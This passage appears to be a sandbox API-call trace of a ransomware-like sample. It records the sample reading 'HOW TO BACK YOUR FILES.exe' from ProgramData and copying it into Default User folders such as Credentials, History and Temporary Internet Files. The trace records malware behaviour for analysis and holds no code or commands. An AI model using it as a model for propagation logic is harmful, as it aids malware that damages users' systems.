(lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.744] GetLastError () returned 0x0 [0078.744] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.744] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.744] CloseHandle (hObject=0xa4) returned 1 [0078.744] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.744] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58881e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58881e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.745] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.745] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.745] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0078.745] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0078.745] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.745] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.745] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.746] GetLastError () returned 0x0 [0078.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.746] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.746] CloseHandle (hObject=0xa4) returned 1 [0078.746] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.746] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58940500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58940500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.746] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.746] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.746] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials" [0078.746] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials" [0078.746] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.746] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.747] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.747] GetLastError () returned 0x0 [0078.747] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.747] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.747] CloseHandle (hObject=0xa4) returned 1 [0078.747] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.748] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.748] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.748] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.748] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History" [0078.748] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History" [0078.748] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.748] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.748] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.749] GetLastError () returned 0x0 [0078.749] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.749] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.749] CloseHandle (hObject=0xa4) returned 1 [0078.749] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.749] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x58966660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58966660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.749] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.749] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.749] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low" [0078.749] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low" [0078.749] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.750] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.750] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.750] GetLastError () returned 0x0 [0078.750] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.750] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.750] CloseHandle (hObject=0xa4) returned 1 [0078.751] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.751] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.751] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.751] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.751] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5" [0078.751] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5" [0078.751] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.751] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.752] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.752] GetLastError () returned 0x0 [0078.752] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.752] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.752] CloseHandle (hObject=0xa4) returned 1 [0078.752] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.752] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x589d8a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x589d8a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.752] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.752] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.752] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data" [0078.752] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data" [0078.753] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.753] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.753] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.753] GetLastError () returned 0x0 [0078.753] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.753] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.753] CloseHandle (hObject=0xa4) returned 1 [0078.754] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.754] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.754] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.754] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.754] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0078.754] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0078.754] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.754] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.755] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.755] GetLastError () returned 0x0 [0078.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.755] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.755] CloseHandle (hObject=0xa4) returned 1 [0078.755] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.755] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.755] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.755] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.756] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0078.756] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0078.756] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.756] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.756] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.756] GetLastError () returned 0x0 [0078.756] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.756] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.757] CloseHandle (hObject=0xa4) returned 1 [0078.757] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.757] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.757] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.757] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.757] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0078.757] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0078.757] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.757] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.758] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 